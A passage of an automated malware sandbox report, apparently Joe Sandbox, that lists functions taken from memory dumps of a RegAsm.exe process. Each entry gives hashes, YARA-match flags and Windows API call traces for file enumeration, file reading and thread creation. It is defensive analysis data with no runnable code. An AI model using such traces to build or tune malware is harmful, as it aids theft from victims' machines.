                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2d83f5e4cc54a4f29f218aecef91005d1f0713bc4be763d09e7c7efc2559b3ae
                                                                                                                                                                                                • Instruction ID: 745991f4c4d381fbc921c977ec3bb97d1aaa72c0998f4ba59e3061683bcd709f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d83f5e4cc54a4f29f218aecef91005d1f0713bc4be763d09e7c7efc2559b3ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1681D476604301ABEB10DF68DC81BAFB7E9FF88714F04082CFD8597280EA75E9458792
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C0FB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: e
                                                                                                                                                                                                • API String ID: 0-4024072794
                                                                                                                                                                                                • Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                                                                                                                                                • Instruction ID: 9cea7d969dc1b81ab4d16663abef2dbf52806b40d3dc2a7e714e9b6e1ab6dab1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 385146766043419FDB04CF2ADC81AB7BBE4FF89612F10856EF88186651E731F854CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B50DFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %lld %lld
                                                                                                                                                                                                • API String ID: 0-3794783949
                                                                                                                                                                                                • Opcode ID: 3f360422da6e98d88b2934091241267ffbad8fb81053451ddf6cb0591c31ee52
                                                                                                                                                                                                • Instruction ID: f3d517cce546915d65a5ab8dea78f8fed844c9d0a06eb9671b70cdb7f8cf6105
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f360422da6e98d88b2934091241267ffbad8fb81053451ddf6cb0591c31ee52
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9731F7B5A012007BFA125B29DC06FDF7BAADFC5710F10881CFA9197251EB72E9119762
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B14D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5B15AC
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B5B1586
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5B15B1
                                                                                                                                                                                                • API called with NULL prepared statement, xrefs: 1B5B1571
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5B15A2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 348303c63962c7062fa6b6eeeb62d1a5e781a73ef18020e282f2b537f214fbb5
                                                                                                                                                                                                • Instruction ID: aa041f2701b8d0c771883ebec34edcb26328d45094be96393ccaa6c3b335b9fd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 348303c63962c7062fa6b6eeeb62d1a5e781a73ef18020e282f2b537f214fbb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 24C117B5D207419BFBA08F26DE45BD777E6BF40354F04092CE88687241E775E449CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5BD4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5BD5E7
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B5BD5C1
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5BD5EC
                                                                                                                                                                                                • API called with NULL prepared statement, xrefs: 1B5BD5AC
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5BD5DD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 256a0055a9f24b31eca79f61afc13721af294c93d32401d1010663c607bd6889
                                                                                                                                                                                                • Instruction ID: 99c75a5ce8ad16ec78d379d2b1c32975d54ba05255daa4485d2512a6520d9d99
                                                                                                                                                                                                • Opcode Fuzzy Hash: 256a0055a9f24b31eca79f61afc13721af294c93d32401d1010663c607bd6889
                                                                                                                                                                                                • Instruction Fuzzy Hash: 52B1B1B59007419FF7108F24D985BD7B7E6BF84318F04492CE8998B281E776E44ACBA3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00409531 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00409536
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00424E1C,?,?,00424BFA,00000000), ref: 004095B3
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E20), ref: 004095D0
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E24), ref: 004095EA
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00424E28,?,?,00424BFB), ref: 00409681
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00409702
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004087A5: _EH_prolog.MSVCRT ref: 004087AA
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 004098EB
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004098FA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2015904956-0
                                                                                                                                                                                                • Opcode ID: 1af04abc06d6bc89197d961ed19f84c6bdc79f3b6133f4f9b5cbd85f798cdee3
                                                                                                                                                                                                • Instruction ID: 797d67777bfb35149a3cb65bc62c5bef38ee81358c28f2b680a1fecc1a85ea3b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1af04abc06d6bc89197d961ed19f84c6bdc79f3b6133f4f9b5cbd85f798cdee3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EC19974900248EADF40EBB6D946BDD7FB8AF05314F14456EE445B32C2DB785B08CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040994C Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00409951
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00424BFE,00000000,75B0AC90), ref: 004099B0
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E34), ref: 004099CD
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E38), ref: 004099E7
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00409F53
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00409F62
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                • String ID: "$\*.*
                                                                                                                                                                                                • API String ID: 1275501236-2874818444
                                                                                                                                                                                                • Opcode ID: 025d80593547f85e3b26cbf902971ce118cb3220362a313577e05ad7aa6cd319
                                                                                                                                                                                                • Instruction ID: 442f60aee239f96d41c3c9371088bd5c07d6a5438acdaa834dec4229389d6373
                                                                                                                                                                                                • Opcode Fuzzy Hash: 025d80593547f85e3b26cbf902971ce118cb3220362a313577e05ad7aa6cd319
                                                                                                                                                                                                • Instruction Fuzzy Hash: FF127F71800148EADB45EBA2C956FEEBB78AF25304F1044AFA446731C2DF385B58DB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B574D40 Relevance: 14.0, APIs: 9, Instructions: 476COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 46a9f175eab1b539870f142f9dfb566b4b1c34942289a01b7c360728d5e4df0b
                                                                                                                                                                                                • Instruction ID: c65e9ac8f140bf23fbee67753c74e42c39c4d80eb8ffd0f4b306e213d83dbf0c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a9f175eab1b539870f142f9dfb566b4b1c34942289a01b7c360728d5e4df0b
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F1F8B0A003429FE710AF65DC88A9B77F8EFD5319F44492DEC9482241E775E949CBE2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B508200 Relevance: 14.0, APIs: 9, Instructions: 466COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 09d3eab9d81a605ea2364a0aabb3d9955ba765fc9b51bd33753bdfecab41d682
                                                                                                                                                                                                • Instruction ID: 2bc78b00bb3030eda54bff3616216ecb47552252ae4f2e79a8b43db6b8a00dcc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09d3eab9d81a605ea2364a0aabb3d9955ba765fc9b51bd33753bdfecab41d682
                                                                                                                                                                                                • Instruction Fuzzy Hash: D502B372904311AFE7159F64C880F9BB7E8BF88354F044A2DFD8997250EB75D898CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B545940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
